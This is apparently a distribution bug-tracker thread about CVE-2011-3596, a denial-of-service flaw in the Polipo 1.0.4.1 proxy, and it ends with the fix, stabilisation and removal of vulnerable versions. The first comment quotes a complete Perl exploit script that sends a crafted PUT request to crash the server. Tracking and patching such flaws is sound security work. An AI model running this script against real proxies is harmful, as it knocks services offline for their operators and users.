From the Full-Disclosure posting at $URL: # Exploit Title: [POLIPO 1.0.4.1 Denial Of Service] # Date: [10/05/10] # Author: [Usman Saeed] # Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/] # Version: [1.0.4.1] # Tested on: [Windows 7 Home] # CVE : [if exists] # Code : [exploit code] Disclaimer: [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] [*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/ [*] Attack type : Remote [*] Patch Status : Unpatched [*] Description : By sending a crafted POST/PUT request to the server , the proxy server crashes ! [*] Exploitation : #!/usr/bin/perl # POLIPO 1.0.4.1 Denial Of Service # Disclaimer: # [This code is for Educational Purposes , I would Not be responsible for any misuse of this code] # Author: Usman Saeed # Company: Xc0re Security Research Group # Website: http://www.xc0re.net # DATE: [30/09/11] $host = $ARGV[0]; $PORT = $ARGV[1]; $evil = "PUT / HTTP/1.1\r\n". "Content-Length:1\r\n\r\n"; use IO::Socket::INET; if (! defined $ARGV[0]) { print "+========================================================+\n"; print "+ Program [POLIPO 1.0.4.1 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [30/09/11] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; exit; } $sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!"; print "+========================================================+\n"; print "+ Program [POLIPO 1.0.4.1 Denial Of Service] +\n"; print "+ Author [Usman Saeed] +\n"; print "+ Company [Xc0re Security Research Group] +\n"; print "+ DATE: [30/09/11] +\n"; print "+ Usage :perl sploit.pl webserversip wbsvrport +\n"; print "+ Disclaimer: [This code is for Educational Purposes , +\n"; print "+ I would Not be responsible for any misuse of this code]+\n"; print "+========================================================+\n"; print "\n"; print "[*] Initializing\n"; sleep(2); print "[*] Sendin evil Packet Buhahahahaha \n"; send ($sock , $evil , 0); print "[*] Crashed :) \n"; $res = recv($sock,$response,1024,0); print $response; exit; -- Usman Saeed Blog : http://www.xc0re.net/blog Twitter : http://twitter.com/xc0resecurity Facebook : https://www.facebook.com/pages/Xc0re-Security-Reseach-Group/168397916536539
Hello, polipo-1.1.1 is in tree now. It should fix CVE-2011-3596, from CHANGES file: * Fail expectations on the local interface. This might or might not be what CVE-2011-3596 is about, difficult to say since nobody is speaking to me. So upstream is not 100% sure, but at least exploit from comment 1 doesn't work anymore: polipo bails out with "405 Method not allowed". Please not that 1.1.1 also fixes CVE-2009-3305: * Fixed a crash that occurs when a server sends a malformed Cache-Control: header (CVE-2009-3305). Thanks to Stefan Fritsch. Vulnerable unstable version is removed. So what is left to stabilize polipo-1.1.1 and remove old stable.
(In reply to Andrew Savchenko from comment #1) > Vulnerable unstable version is removed. So what is left to stabilize > polipo-1.1.1 and remove old stable. Please add arches in CC and tell them with version to stabilize. Also change the title of the bug to reflect which versions are affected.
Arch teams, please stabilize =net-proxy/polipo-1.1.1.
x86 done.
amd64 stable. Maintainer(s), please cleanup. Security, please vote.
All vulnerable versions are removed from tree.
GLSA Vote: No
Vote: NO.
